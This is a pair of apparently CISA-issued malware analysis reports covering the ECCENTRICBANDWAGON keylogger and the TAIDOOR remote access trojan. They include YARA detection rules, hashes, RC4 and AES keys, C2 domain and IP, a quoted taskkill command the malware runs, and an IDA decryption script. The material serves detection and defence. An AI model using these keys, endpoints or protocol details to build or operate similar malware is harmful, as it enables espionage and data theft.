  • rule CISA_3P_10301706_01 : HiddenCobra ECCENTRICBANDWAGON backdoor keylogger reconnaissance screencapture spyware trojan
    {
       meta:
           Author = “CISA Trusted Third Party”
           Incident = “10301706.r1.v1”
           Date = “2020-08-11”
           Actor = “Hidden Cobra”
           Category = “Backdoor Keylogger Reconnaissance Screen-Capture Spyware Trojan”
           Family = “ECCENTRICBANDWAGON”
           Description = “Detects strings in ECCENTRICBANDWAGON proxy tool”
           MD5_1 = “d45931632ed9e11476325189ccb6b530”
           SHA256_1 = “efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e”
           MD5_2 = “acd15f4393e96fe5eb920727dc083aed”
           SHA256_2 = “32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8”
           MD5_3 = “34404a3fb9804977c6ab86cb991fb130”
           SHA256_3 = “c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec”
           MD5_4 = “3122b0130f5135b6f76fca99609d5cbe”
           SHA256_4 = “9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e”
       strings:
           $sn1 = { FB 19 9D 57 [1-6] 9A D1 D6 D1 [1-6] 42 9E D8 FD }
           $sn2 = { 4F 03 43 83 [1-6] 48 E0 1A 2E [1-6] 3B FD FD FD }
           $sn3 = { 68 56 68 9A [1-12] 4D E1 1F 25 [1-12] 3F 38 54 0F [1-12] 73 30 62 A1 [1-12] DB 39 BD 56 }
           $sn4 = “%s\chromeupdater_ps_%04d%02d%02d_%02d%02d%02d_%03d_%d” wide ascii nocase
           $sn5 = “c:\windows\temp\TMP0389A.tmp” wide ascii nocase
       condition:
           any of them
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-04-08 07:26:25-04:00
Import Hash b113cba285f3c4ed179422f54692f4e3
PE Sections
MD5 Name Raw Size Entropy
fd81e5f6ab156dcdba2e2b92826ca192 header 1024 3.015020
88ecd4fac45e45b294de415ca514a93c .text 137728 6.457660
af0dab081123c1ad835c86f134138e7f .rdata 57344 5.118317
e7c661026f7ecf701bbcbdd15ff2b825 .data 3584 2.244033
4b406030a4a3dcaea845c14124010691 .pdata 8192 5.172064
f623a10ca467aac404ec6fda8e4810d4 .gfids 512 2.000422
3695113543a23c53791caa70b4bd8874 .rsrc 512 4.724729
f9f31f1689409c8834b7f0c28d948a65 .reloc 2048 4.924204
Description

This sample is nearly identical to “c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec” with the exception that it RC4 encrypts some of its strings, uses different log files, and has a simple cleanup routine.

The following strings are RC4 encrypted with the key “key”:

–Begin RC4 encrypted strings–
TrendMicroUpdate
c:windowstempTMP0389A.tmp
c:windowstemptmp1105.tmp
[CLIPBOARD]
[/CLIPBOARD]
–End RC4 encrypted strings–

This malware uses 3 files that will be used to store the key logs, screen shots, and log intervals. The location of these logs can be found in C:windowstempTMP0389A.tmp.

–Begin log files–
1. Keylog: %temp%TrendMicroUpdateupdate_<USERNAME>
2. Screenshots: %temp%TrendMicroUpdateupdate_<MMDD>_<HHMMSSl>
3. Log Intervals: c:windowstemptmp1105.tmp
–End log files–

This malware creates 3 threads to populate the log files listed above. Each one will continue to execute until the file C:windowstemptmp0207 contains a zero in a particular location. At this point, the program will signal an exit to the other threads and begin a cleanup thread. The cleanup thread will delete C:windowstemptmp0207 and then call WinExec(cmd.exe /c taskkill /f /im explorer.exe). This will crash explorer.exe, which could potentially alert a user who was using the device at the time.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • August 26, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 3, 2020

Detection and Response

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Defense (DoD). Working with U.S. Government partners, CISA, FBI, and DoD identified a malware variant used by Chinese government cyber actors, which is known as TAIDOOR. For more information on Chinese malicious cyber activity, please visit https[:]//www[.]us-cert.gov/china.

FBI has high confidence that Chinese government actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. CISA, FBI, and DoD are distributing this MAR to enable network defense and reduce exposure to Chinese government malicious cyber activity.

This MAR includes suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to the Cybersecurity and Infrastructure Security Agency (CISA) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.

Malicious binaries identified as a x86 and x64 version of Taidoor were submitted for analysis. Taidoor is installed on a target’s system as a service dynamic link library (DLL) and is comprised of two files. The first file is a loader, which is started as a service. The loader decrypts the second file, and executes it in memory, which is the main Remote Access Trojan (RAT).

For a downloadable copy of IOCs, see MAR-10292089-1.v1.stix.

Submitted Files (4)

0d0ccfe7cd476e2e2498b854cef2e6f959df817e52924b3a8bcdae7a8faaa686 (svchost.dll)

363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90 (svchost.dll)

4a0688baf9661d3737ee82f8992a0a665732c91704f28688f643115648c107d4 (ml.dll)

6e6d3a831c03b09d9e4a54859329fbfd428083f8f5bc5f27abbfdd9c47ec0e57 (rasautoex.dll)

Domains (1)

cnaweb.mrslove.com

IPs (1)

210.68.69.82

Findings

4a0688baf9661d3737ee82f8992a0a665732c91704f28688f643115648c107d4

Tags

loader

Details
Name ml.dll
Size 43520 bytes
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 6aa08fed32263c052006d977a124ed7b
SHA1 9a6795333e3352b56a8fd506e463ef634b7636d2
SHA256 4a0688baf9661d3737ee82f8992a0a665732c91704f28688f643115648c107d4
SHA512 179e9d9ccbc268cc94a7f6d31f29cf0f7a163db829a4557865f3c1f98614f94ceb7b90273d33eb49ef569cfc9013b76c7de32d7511639a7ab2c352f3137d51b6
ssdeep 768:uGRVnBnwS5kBKsl4anxKFhx3W3kGmifmUED7Bn5f6dBywFmZb:fDeSnbx3okvxVwFI
Entropy 5.864467
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-01-03 07:16:12-05:00
Import Hash dbb469cb14550e6085a14b4b2d41ede9
PE Sections
MD5 Name Raw Size Entropy
62ab3bae7859f6f6dc68366d283ad53e header 1024 2.511204
63550f7c47453c2809834382e228637d .text 23040 6.442964
a30bb3ac9b6694a8980c39c0267c9a83 .rdata 11264 4.926331
ad5814673b8579de78be5b6b929d2405 .data 3072 2.629944
619ecca9c8d1073a0b90f5fffac42ec8 .rsrc 512 5.105029
0f292021853e7ca76c4196bcbe9afdaf .reloc 4608 3.712197
Packers/Compilers/Cryptors
Microsoft Visual C++ DLL *sign by CodeRipper
Relationships
4a0688baf9… Used 363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90
Description

This file is a 32-bit Windows DLL file. The file “ml.dll” is a Taidoor loader. The file utilizes the export function called “MyStart” to decrypt and load “svchost.dll” (8CF683B7D181591B91E145985F32664C), which was identified as Taidoor malware. Taidoor is a traditional RAT.

The “MyStart” function looks for the file name “svchost.dll” in its running directory. If that file is located, the DLL will read “svchost.dll” into memory. After the file is read into memory, the DLL uses a RC4 encryption algorithm to decrypt the contents of the file. The RC4 key used for decryption is, “ar1z7d6556sAyAXtUQc2”.

After the loader has finished decrypting “svchost.dll”, the loader now has a decrypted version of Taidoor, which is a DLL. The loader then uses the API calls GetProcessHeap, GetProcAddress, and LoadLibrary to load the following DLLs, KERNEL32.dll, ADVAPI32.dll, and WS2_32.dll, which Taidoor will utilize.

Next, the loader looks for the export “Start” in the Taidoor DLL and executes that function.

363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90

Tags

remote-access-trojan

Details
Name svchost.dll
Size 158208 bytes
Type data
MD5 8cf683b7d181591b91e145985f32664c
SHA1 f0a20aaf4d2598be043469b69075c00236b7a89a
SHA256 363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90
SHA512 b75401d591caee812c5c1a669ce03c47f78f1c40a2fa31cf58a0318ffbfc032b82cb1b6d2a599ce1b3547be5a404f55212156640b095f895a9aac3c58ec4bad8
ssdeep 3072:fRxYk0d5+6/kdGyfitoxNsUZE2XZ+4Duz6fCKmjjwF5PaT:JqkoiGiZxE4qRKqgIT
Entropy 7.998691
Antivirus

No matches found.

YARA Rules
  • rule CISA_10292089_01 : rat loader TAIDOOR
    {
       meta:
           Author = “CISA Code & Media Analysis”
           Incident = “10292089”
           Date = “2020-06-18”    
           Last_Modified = “20200616_1530”
           Actor = “n/a”
           Category = “Trojan Loader Rat”
           Family = “TAIDOOR”
           Description = “Detects Taidoor Rat Loader samples”
           MD5_1 = “8cf683b7d181591b91e145985f32664c”
           SHA256_1 = “363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90”
           MD5_2 = “6627918d989bd7d15ef0724362b67edd”
           SHA256_2 = “0d0ccfe7cd476e2e2498b854cef2e6f959df817e52924b3a8bcdae7a8faaa686”
       strings:
           $s0 = { 8A 46 01 88 86 00 01 00 00 8A 46 03 88 86 01 01 00 00 8A 46 05 88 86 02 01 00 00 8A 46 07 88 86 03 01 00 00 }
           $s1 = { 88 04 30 40 3D 00 01 00 00 7C F5 }
           $s2 = { 0F BE 04 31 0F BE 4C 31 01 2B C3 2B CB C1 E0 04 0B C1 }
           $s3 = { 8A 43 01 48 8B 6C 24 60 88 83 00 01 00 00 8A 43 03 }
           $s4 = { 88 83 01 01 00 00 8A 43 05 88 83 02 01 00 00 8A 43 07 88 83 03 01 00 00 }
           $s5 = { 41 0F BE 14 7C 83 C2 80 41 0F BE 44 7C 01 83 C0 80 C1 E2 04 0B D0 }
           $s6 = { 5A 05 B2 CB E7 45 9D C2 1D 60 F0 4C 04 01 43 85 3B F9 8B 7E }
       condition:
           ($s0 and $s1 and $s2) or ($s3 and $s4 and $s5) or ($s6)
    }
ssdeep Matches

No matches found.

Relationships
363ea096a3… Used_By 4a0688baf9661d3737ee82f8992a0a665732c91704f28688f643115648c107d4
363ea096a3… Connected_To cnaweb.mrslove.com
363ea096a3… Connected_To 210.68.69.82
Description

This encrypted file has been identified as the Taidoor RAT loaded by “ml.dll” (6AA08FED32263C052006D977A124ED7B). After the loader has finished decrypting this file, the loader has a decrypted version of Taidoor, which is a DLL. The loader then uses the API calls GetProcessHeap, GetProcAddress, and LoadLibrary to load the following DLLs, KERNEL32.dll, ADVAPI32.dll, and WS2_32.dll, which this file will utilize.

Next, the loader “ml.dll” (6AA08FED32263C052006D977A124ED7B) looks for the export “Start” in the Taidoor DLL and executes that function. Taidoor’s “Start” function kicks off by decrypting a multitude of import strings that it will use to dynamically import functions from the DLLs that have been loaded. A complex stream cipher is used to decrypt the encrypted strings utilized by this malware. The 85 strings include APIs and strings used by other structures, such as a structure capable of allowing the malware to load external plugin payloads. The malware utilizes the following 7-byte key to generate a 256-byte initial stream cipher value: “19 34 F4 D2 E9 B3 0F”.

Next, the algorithm pads the 256 initial cipher value out to 260 bytes utilizing 4-bytes already contained within the 256-byte block (Figure 2). The algorithm performs the encryption 2-bytes at a time from the encrypted string blocks. It compresses the 2-bytes into 1 byte before the decryption process by subtracting the first byte and second byte by 0x80h. The result of the performing the subtraction on the first byte is then shifted left by four. Both values are then added together by using Boolean addition (OR) resulting in a single byte that is decrypted by the cipher.

Using a simple Exclusive OR (XOR) operation, the 260-byte block is shuffled and modified to produce the byte that is used to decrypt the newly compressed byte. The byte being decrypted is then placed back into the 260-byte cipher block buffer. This effectively produces a recurrent block shifting effect where the 260-byte cipher block value changes as a result of the sequence of bytes it receives. This is an effective method of thwarting heuristic or brute force attacks.

Taidoor also uses the AES algorithm to decrypt a “1616 byte” configuration file. This configuration file contains the command and control (C2) servers and possibly another encryption key used later. The AES key used in hex is, “2B 7E 15 16 28 AE D2 A6 AB F7 15 88 09 CF 4F 3C” IV: “00”.

–Begin C2–
cnaweb.mrslove.com
210.68.69.82
–End C2–

After completing this decryption function Taidoor iterates through the System Event Log. Looking specifically for event IDs 6005 (event service started) and 6006 (event service stopped). After completing its decryption functions, Taidoor tries to connect to its C2 server. Once Taidoor and the C2 server finish the TCP handshake, Taidoor waits for at least one byte of data to be sent from the C2 server. This byte or bytes are not checked by Taidoo, anything can be sent.

After Taidoor has confirmed it has received at least one byte of data form the server, Taidoor sends a custom formatted packet over port 443. Note: this packet does not follow TLS protocol, and is easily identifiable. The initial packet sent from Taidoor to the C2 server in this case always starts with “F::” followed by the encryption key that Taidoor, and the C2 server will use to encrypt all following communications.

After sending the encryption key to the C2 server, Taidoor expects the server to respond with “200 OKrnrn”. Note: This response is over port 443, but is not encrypted, it is sent in clear text.

After Taidoor has successfully connected to its C2, it creates a Windows INI configuration file, and copies cmd.exe into the system temp folder.

–Begin Windows INI file created–
C:ProgramDataMicrosoft~svc_.TMp
–End Windows INI file created–

–Begin contents of INI file–
[Micros]
source=c:tempcmd.exe
–End contents of INI file–

Note: Taidoor does not have a function built it that enables it to persist past a system reboot. It appears from the memory dump of the infected system, it was installed as a service DLL by some other means.

The malware author never removed the symbol file for the “ml.dll” build. This artifact provides additional information that the malware author intended this binary to do, “DllHijackPlushInject”.

–Begin symbol file artifact–
c:UsersuserDesktopDllHijackPlushInjectversionReleaseMemoryLoad.pdb
–End symbol file artifact–

The following IDA script can be used to decrypt all the encrypted strings and demonstrate how a sequence of bytes is encrypted utilizing the initial 260 byte cipher block generated from the key value “19 34 F4 D2 E9 B3 0F”:

–Begin IDA script–
import os
import sys
import idaapi
cwd = os.getcwd()
cwd = ‘/Users/terminator/PycharmProjects/rc4_test//’
cipherblock = []
pb_fname = cwd + “//” + ‘pristine_block.bin’
es_fname = cwd + “//” + ‘encrypted_strings.bin’
secure_strings_func = 0x10003cb7
encrypted_strings_block = 0x1001c434
enc_string_size = 2875
global_decrypted_stringz = []
try:
fh = open(pb_fname, ‘rb’)
read_bitez = fh.read()
fh.close()
except Exception as e:
print(“Couldnt read filename. Reading from code (Attempt)”)
print(“Cipher Block len: ” + str(len(cipherblock)))
for idx in read_bitez: # convert them to ords to do the math!
idx = ord(idx)
cipherblock.append(idx)
def decrypt(encrypted_string, cipherblock): # **CALL THIS FUNC to decrypt stuff!
string_len = len(encrypted_string)
string_len = string_len / 2
throttle = 0
da_string = “”
while True:
cipherblock, decoded_byte = decrypt_it(cipherblock, encrypted_string, throttle)
try:
charr = chr(decoded_byte)
if throttle:
da_string += charr
except Exception as e:
pass
throttle += 1 # INCREMENT before doing the compare
if throttle == string_len:
global_decrypted_stringz.append(da_string)
return da_string
def decrypt_it(cipherblock, encoded_data, throttle):
ebx = 128 # *0x80
ecx = throttle
ecx = ecx + ecx
eax = encoded_data[ecx]
ecx = encoded_data[ecx + 1]
eax = eax – ebx
ecx = ecx – ebx
eax = eax << 4
eax = eax | ecx
cipherblock, decoded_byte = outter_shuffle_func(cipherblock, eax)
return cipherblock, decoded_byte
def outter_shuffle_func(cipherblock, encoded_bite):
# before inner func
cipherblock = inner_shuffle_func(cipherblock)
# after inner func
eax = cipherblock[258]
ecx = cipherblock[eax]
eax = cipherblock[260]
eax = cipherblock[eax]
edx = cipherblock[257]
edi = cipherblock[256]
edx = cipherblock[edx]
edi = cipherblock[edi]
ecx = eax + ecx
eax = cipherblock[259]
eax = cipherblock[eax]
ecx = eax + ecx
eax = 255
ecx = ecx & eax
ecx = cipherblock[ecx]
cl = cipherblock[ecx]
edx = edx + edi
edx = edx & eax
cl = cipherblock[edx] ^ cl # **actual manipulation here
al = encoded_bite
cl = cl ^ al
cipherblock[260] = al
cipherblock[259] = cl
al = cl
decoded_byte = al
return cipherblock, decoded_byte
def wrap_around_strip(da_byte):
da_byte_str = str(hex(da_byte))
da_byte_str = da_byte_str.split(“x”)
da_byte_str = da_byte_str[1]
str_length = len(da_byte_str)
if str_length > 2:
got_em = “0x”
got_em += da_byte_str[str_length – 2]
got_em += da_byte_str[str_length – 1]
got_em = int(got_em, 16)
return got_em
return da_byte
def add_bites(a, b):
for_return = a + b
for_return = wrap_around_strip(for_return)
return for_return
def inner_shuffle_func(cipherblock_orig): # *SHUFFLE The cipher block here!
cipherblock = []
for idx in cipherblock_orig: # lets make a copy!
cipherblock.append(idx)
al = cipherblock[256]
esi = cipherblock[260]
dl = cipherblock[esi]
al = al & 0xffffff
edi = al
bl = cipherblock[edi]
da_byte = cipherblock[257]
da_byte = add_bites(da_byte, bl)
cipherblock[257] = da_byte
al += 1
cipherblock[256] = al
eax = cipherblock[257]
al = cipherblock[eax]
cipherblock[esi] = al
esi = cipherblock[259]
bl = cipherblock[esi]
edi = cipherblock[257]
cipherblock[edi] = bl
esi = cipherblock[256]
eax = cipherblock[259]
bl = cipherblock[esi]
cipherblock[eax] = bl
eax = cipherblock[256]
cipherblock[eax] = dl
eax = dl
al = cipherblock[eax]
temp_byte = cipherblock[258]
temp_byte = add_bites(temp_byte, al)
cipherblock[258] = temp_byte
return cipherblock
def decode_from_addr(target_addr, label_loc, pointer_addr, label_them):
init_bitez = []
ord_bitez = []
while True:
temp_bite = idaapi.get_byte(target_addr)
if not temp_bite:
break
init_bitez.append(temp_bite)
target_addr += 1
for idx in init_bitez:
ord_bitez.append(idx)
cipher_block_copy = []
for idx in cipherblock:
cipher_block_copy.append(idx)
dec_string = decrypt(ord_bitez, cipher_block_copy)
if label_them:
SetColor(label_loc, CIC_ITEM, 0xc7c7ff)
MakeComm(label_loc, dec_string)
SetColor(pointer_addr, CIC_ITEM, 0xc7c7ff)
MakeComm(pointer_addr, dec_string)
print(dec_string)
def find_initial_loc(target_addr):
addr = target_addr
give_up = 5
attempts = 0
while True:
addr = idc.PrevHead(addr)
if GetMnem(addr) == “push” and “off_” in GetOpnd(addr, 0):
string_addr = GetOperandValue(addr, 0)
print(“Found String Loc: ” + str(hex(string_addr)))
pointer_addr = idaapi.get_dword(string_addr)
print(hex(pointer_addr))
decode_from_addr(pointer_addr, addr, string_addr, 1)
return string_addr
attempts += 1
if attempts == give_up:
return 0
enc_stringz_data = []
try:
fh = open(es_fname)
da_data = fh.read()
fh.close()
for idx in da_data:
x = ord(idx)
enc_stringz_data.append(x)
except Exception as e:
print(“Couldnt read encrypted strings file. Reading from Malware!”)
addr_throttle = encrypted_strings_block
while len(enc_stringz_data) < enc_string_size:
x = idaapi.get_byte(addr_throttle)
enc_stringz_data.append(x)
encrypted_stringz = [] # *list of lists
temp_string = []
for idx in enc_stringz_data:
if idx:
temp_string.append(idx)
if not idx:
if len(temp_string):
encrypted_stringz.append(temp_string)
temp_string = []
decrypted_stringz = []
debug_it = False
if debug_it:
for enc_string in encrypted_stringz:
cipher_block_copy = []
for idx in cipherblock:
cipher_block_copy.append(idx)
dec_string = decrypt(enc_string, cipher_block_copy)
decrypted_stringz.append(dec_string)
print(“———————-“)
for idx in decrypted_stringz:
print(idx)
print(“Complete”)
addresses_to = []
for addr in XrefsTo(secure_strings_func):
print(“———“)
print(hex(addr.frm))
find_initial_loc(addr.frm)
print(“———“)
print(“n”)
addresses_to.append(addr.frm)
print(“IDA IDB Labeled. Decrypted Strings Below:”)
print(“—————————–“)
for idx in global_decrypted_stringz:
print idx
–End IDA script–

String decrypted by the IDA script are displayed below:

–Begin decrypted strings–
kernel32.dll
InitializeCriticalSection
GetLocalTime
LeaveCriticalSection
GetModuleFileNameA
Sleep
ExpandEnvironmentStringsA
GetSystemTime
SystemTimeToFileTime
GetTickCount
CreatePipe
DuplicateHandle
GetCurrentProcess
DisconnectNamedPipe
TerminateProcess
PeekNamedPipe
ReadFile
CreateFileA
SetFileTime
OpenProcess
GetFileTime
WaitForSingleObject
WriteFile
DeleteFileA
GetCurrentProcessId
GetAdaptersInfo
advapi32.dll
RegOpenKeyExA
RegQueryValueExA
RegCloseKey
OpenEventLogA
ReadEventLogA
CloseEventLog
RegDeleteValueA
RegCreateKeyExA
RegNotifyChangeKeyValue
Can’t open update file.
File too small.
SOFTWAREMicrosoftWindows NTCurrentVersion
RValue
SOFTWAREMicrosoftWindows NTCurrentVersion
RValue
%temp%~lpz.zp
Can’t find plug file
Can’t find plug file
Can’t load more plug
Load Dll Plug Failed
%suaq*.dll
services.exe
Create File Failed
Create File Failed
rundll32.exe
SOFTWAREMicrosoftWindows NTCurrentVersion
RValue
RValue
%SystemRoot%system32cmd.exe
source
Micros
CmdPage
InfoPage
cmd.exe
source
Micros
avp.exe
shell process Terminated
ReadShellThread closed
Create result file failed
Create result file failed
CreateProcess Error: %d
CreateProcess Error: %d
CreateProcess succ
Open file Failed
File Size is 0
Open file Failed
Create File Failed
Create File Failed
no shell
services.exe
200
F::
200 OK
–End decrypted strings–

Screenshots

Figure 1 - Screenshot of the following strings that are used as imports.

Figure 1 – Screenshot of the following strings that are used as imports.

Figure 2 - Screenshot of the complex stream cipher padding the initial cipher value.

Figure 2 – Screenshot of the complex stream cipher padding the initial cipher value.

Figure 3 - Screenshot of the complex steam cipher compressing 2-bytes into 1-byte.

Figure 3 – Screenshot of the complex steam cipher compressing 2-bytes into 1-byte.

cnaweb.mrslove.com

Tags

command-and-control

Ports
  • 443 TCP
Whois

Queried whois.publicdomainregistry.com with “mrslove.com”…

Domain Name: MRSLOVE.COM
Registry Domain ID: 70192241_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.publicdomainregistry.com
Registrar URL: www.publicdomainregistry.com
Updated Date: 2020-02-26T08:01:27Z
Creation Date: 2001-05-02T02:10:12Z
Registrar Registration Expiration Date: 2021-05-02T02:10:12Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Domain Status: OK https://icann.org/epp#OK
Registry Registrant ID: Not Available From Registry
Registrant Name: changeip operations
Registrant Organization: changeip.com
Registrant Street: 1200 brickell ave
Registrant City: miami
Registrant State/Province: florida
Registrant Postal Code: 33131
Registrant Country: US
Registrant Phone: +1.800791337
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: noc@changeip.com
Registry Admin ID: Not Available From Registry
Admin Name: changeip operations
Admin Organization: changeip.com
Admin Street: 1200 brickell ave
Admin City: miami
Admin State/Province: florida
Admin Postal Code: 33131
Admin Country: US
Admin Phone: +1.800791337
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: noc@changeip.com
Registry Tech ID: Not Available From Registry
Tech Name: changeip operations
Tech Organization: changeip.com
Tech Street: 1200 brickell ave
Tech City: miami
Tech State/Province: florida
Tech Postal Code: 33131
Tech Country: US
Tech Phone: +1.800791337
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: noc@changeip.com
Name Server: ns1.changeip.com
Name Server: ns2.changeip.com
Name Server: ns3.changeip.com
Name Server: ns4.changeip.com
Name Server: ns5.changeip.com
DNSSEC: Unsigned
Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
Registrar Abuse Contact Phone: +1.2013775952
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

Relationships
cnaweb.mrslove.com Connected_From 363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90
Description

svchost.dll (8cf683b7d181591b91e145985f32664c) attempts to connect to the following domain.

210.68.69.82

Tags

command-and-control

Ports
  • 443 TCP
Whois

Queried whois.apnic.net with “210.68.69.82”…

% Information related to ‘210.68.0.0 – 210.68.255.255’

% Abuse contact for ‘210.68.0.0 – 210.68.255.255’ is ‘hostmaster@twnic.net.tw’

inetnum:        210.68.0.0 – 210.68.255.255
netname:        SEEDNET
descr:         Digital United Inc.
descr:         9F, No. 125, Song Jiang Road
descr:         Taipei, Taiwan
country:        TW
admin-c:        JC256-AP
tech-c:         JC256-AP
mnt-by:         MAINT-TW-TWNIC
mnt-irt:        IRT-TWNIC-AP
status:         ALLOCATED PORTABLE
last-modified: 2018-12-12T06:04:02Z
source:         APNIC

irt:            IRT-TWNIC-AP
address:        Taipei, Taiwan, 100
e-mail:         hostmaster@twnic.net.tw
abuse-mailbox: hostmaster@twnic.net.tw
admin-c:        TWA2-AP
tech-c:         TWA2-AP
auth:         # Filtered
remarks:        Please note that TWNIC is not an ISP and is not empowered
remarks:        to investigate complaints of network abuse.
mnt-by:         MAINT-TW-TWNIC
last-modified: 2015-10-08T07:58:24Z
source:         APNIC

person:         Jonas Chou
nic-hdl:        JC256-AP
e-mail:         Jonaschou@fareastone.com.tw
address:        2F, No.218, Rueiguang Road
address:        Taipei, 114, R.O.C
phone:         +886-2-7700-8888
fax-no:         +886-2-7700-8888
country:        TW
mnt-by:         MAINT-TW-TWNIC
last-modified: 2012-12-18T10:10:01Z
source:         APNIC

% Information related to ‘210.68.69.80 – 210.68.69.87’

inetnum:        210.68.69.80 – 210.68.69.87
netname:        42888423-TW
descr:         Taipei Taiwan
country:        TW
admin-c:        NN3251-TW
tech-c:         NN3251-TW
mnt-by:         MAINT-TW-TWNIC
remarks:        This information has been partially mirrored by APNIC from
remarks:        TWNIC. To obtain more specific information, please use the
remarks:        TWNIC whois server at whois.twnic.net.
changed:        DavidLin1@fareastone.com.tw 20180330
status:         ASSIGNED NON-PORTABLE
source:         TWNIC

person:         NULL
address:        N/A Taiwan
country:        TW
e-mail:         joy25488@gmail.com
nic-hdl:        NN3251-TW
changed:        hostmaster@twnic.net.tw 20180331
source:         TWNIC

% This query was served by the APNIC Whois Service version 1.88.15-SNAPSHOT (WHOIS-US4)

Relationships
210.68.69.82 Connected_From 363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90
Description

svchost.dll (8cf683b7d181591b91e145985f32664c) attempts to connect to the following IP address.

6e6d3a831c03b09d9e4a54859329fbfd428083f8f5bc5f27abbfdd9c47ec0e57

Tags

loader

Details
Name rasautoex.dll
Size 50176 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 4ec8e16d426a4aaa57c454c58f447c1e
SHA1 5c89629e5873072a9ca3956b67cf7b5080312c80
SHA256 6e6d3a831c03b09d9e4a54859329fbfd428083f8f5bc5f27abbfdd9c47ec0e57
SHA512 284e0dff33f4ffb6d55f2fdb1de81d5644fb2671aa358dfb72b34a50632f708b7b071202202efec0b48bc0f622c6947f8ccf0818ebaff7277eda854cee67eeaa
ssdeep 768:DN5oCkAI3effi5djegTXLzAl78S3ge0eYUi3EaQkDdXptOKeosAmMotwEX1:DN5oCk1eyTXn+qXUi3pptJMwE
Entropy 5.681253
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-01-04 02:11:55-05:00
Import Hash 956b48719c7be61f48572c8fa464e00c
PE Sections
MD5 Name Raw Size Entropy
a9b389fc8171131551c6570d2395de57 header 1024 2.619293
8dabe7bfc2ee6b9819f554b2694c98eb .text 26624 6.217867
8e63e6b885c3d270ccfb7607b9662601 .rdata 14848 4.618383
d44f2a519c2649244a8c87581872b483 .data 4096 2.280898
0aa4114597794059e1d4a2c246c7d7a5 .pdata 2048 4.331432
7197f896bddfd6e434b1d5703bf0c5a2 .rsrc 512 5.097979
54bb45b94c64d3717b1be8194fb4a6a7 .reloc 1024 3.689756
Description

